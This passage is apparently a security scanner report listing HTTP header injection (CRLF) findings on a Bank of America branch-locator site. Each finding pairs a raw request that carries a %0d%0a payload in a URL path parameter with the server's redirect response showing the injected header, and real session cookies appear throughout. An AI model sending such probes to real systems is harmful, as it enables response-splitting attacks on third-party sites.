CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:45:03 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=B0B0F91B05B27912F9B3E78AC9A6F3B9.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/6d214 39176fb021e/bank_branch_locations/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 99751%0d%0a75235a7d4b7 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/99751%0d%0a75235a7d4b7/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:45:04 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=B8FFDBD91D89734C8ADCA1598866AA7B.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/99751 75235a7d4b7/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 4f1cd%0d%0a357be26faff was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/4f1cd%0d%0a357be26faff=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:46:36 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=FEF4DA431F2E69C9828C0644A6B81B50.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/4f1cd 357be26faff=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 7629f%0d%0a71aae8847de was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/7629f%0d%0a71aae8847de/bank_branch_locations/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:44:22 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=4E71F3904E471E69AA42D4A09C4B3FD5.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/7629f 71aae8847de/bank_branch_locations/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload ae22c%0d%0a20e716262bc was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/ae22c%0d%0a20e716262bc/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:44:26 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=479FB7BC36C77963BA5687C87E041D70.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/ae22c 20e716262bc/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 897bf%0d%0a69424dd73d1 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/897bf%0d%0a69424dd73d1/bank_branch_locations/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:47:55 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=057EDAAA7918E3E2CBCB1ECAA2B4C9E2.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/897bf 69424dd73d1/bank_branch_locations/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 9b94e%0d%0a3fb78cbe5de was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/9b94e%0d%0a3fb78cbe5de/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:46:18 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=7D9FAC133FEFB19FCAE02CB5D6EBCDC0.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/9b94e 3fb78cbe5de/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 35ccc%0d%0ac825c010026 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/35ccc%0d%0ac825c010026=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:46:18 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=D6980AEC4725D40586E189576DAABCB7.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/35ccc c825c010026=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload cf97b%0d%0adba134c651a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
